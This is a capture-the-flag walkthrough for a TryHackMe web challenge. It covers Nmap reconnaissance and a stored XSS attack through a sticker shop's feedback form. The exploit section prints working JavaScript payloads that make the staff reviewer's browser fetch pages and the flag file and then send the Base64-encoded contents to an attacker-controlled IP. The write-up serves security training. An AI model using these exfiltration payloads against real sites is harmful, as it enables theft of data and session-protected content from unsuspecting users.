The Sticker Shop

Can you exploit the sticker shop in order to capture the flag?

TryHackMe | Cyber Security TrainingTryHackMe

Recon

We begin with an Nmap scan and discover two open ports: port 22, which hosts an SSH service, and port 8080, running a Python Werkzeug server featuring a cat sticker shop.

┌──(kali㉿kali)-[~]
└─$ nmap -p- stickershop.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 11:38 IST
Nmap scan report for stickershop.thm (10.10.42.251)
Host is up (0.15s latency).
Not shown: 65506 closed tcp ports (conn-refused), 27 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 823.41 seconds
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 22,8080 stickershop.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 11:55 IST
Nmap scan report for stickershop.thm (10.10.42.251)
Host is up (0.15s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
|   256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
|_  256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
8080/tcp open  http-proxy Werkzeug/3.0.1 Python/3.8.10
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
|_http-title: Cat Sticker Shop
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.1 Python/3.8.10
|     Date: Tue, 11 Feb 2025 06:25:12 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 1655
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>Cat Sticker Shop</title>
|     <style>
|     body {
|     font-family: Arial, sans-serif;
|     margin: 0;
|     padding: 0;
|     header {
|     background-color: #333;
|     color: #fff;
|     text-align: center;
|     padding: 10px;
|     header ul {
|     list-style: none;
|     padding: 0;
|     header li {
|     display: inline;
|     margin-right: 20px;
|     header a {
|     text-decoration: none;
|     color: #fff;
|     font-weight: bold;
|     .content {
|     padding: 20px;
|_    .product {
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=2/11%Time=67AAED49%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,726,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.0\.1\
..................
SF:20\x20\x20\x20\x20\x20bo");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.77 seconds

The index page showcases various stickers, and there is also a Feedback page available.

The Feedback page allows users to submit comments, which are later reviewed by the staff. This suggests a potential entry point for an XSS attack.

Exploit

The challenge requires us to retrieve the flag from http://stickershop/flag.txt using client-side exploitation.

Additionally, it mentions that everything is developed and hosted on the same machine, which could be useful for our attack strategy.

Your local sticker shop has finally developed its own webpage. They do not have too much experience regarding web development, so they decided to develop and host everything on the same computer that they use for browsing the internet and looking at customer feedback. Smart move!

Can you read the flag at http://stickershop:8080/flag.txt?

However, we are not allowed to access http://stickershop:8080/flag.txt.

First, we test for basic XSS by injecting a script that sends a request to our web server. If we receive a response, we can confirm the vulnerability.

<script src="http://10.17.15.155/test"></script>

Since we received a response, we can now craft a payload that forces the user's browser to make a request to the target page on our behalf.

Now, we craft a JavaScript payload that will fetch the content of the root path (/) and exfiltrate the Base64-encoded response to our remote server. The payload uses no-cors mode to bypass restrictions and credentials: 'same-origin' to include session cookies, allowing us to capture potentially sensitive data.

<script>
fetch("/", {method:'GET',mode:'no-cors',credentials:'same-origin'})
  .then(response => response.text())
  .then(text => { 
    fetch('http://10.17.15.155/' + btoa(text), {mode:'no-cors'}); 
  });
</script>

We get a base64-encoded response back.

We successfully got the index page by the user reviewing the feedback.

We modify our JavaScript payload to specifically fetch the contents of /flag.txt instead of the root path. The updated script ensures that the request captures the flag file and exfiltrates it to our remote server using Base64 encoding.

<script>
fetch("/flag.txt", {method:'GET',mode:'no-cors',credentials:'same-origin'})
  .then(response => response.text())
  .then(text => { 
    fetch('http://10.17.15.155/' + btoa(text), {mode:'no-cors'}); 
  });
</script>

After we have submitted our payload, we get a connection back to our web server.

And it is the flag.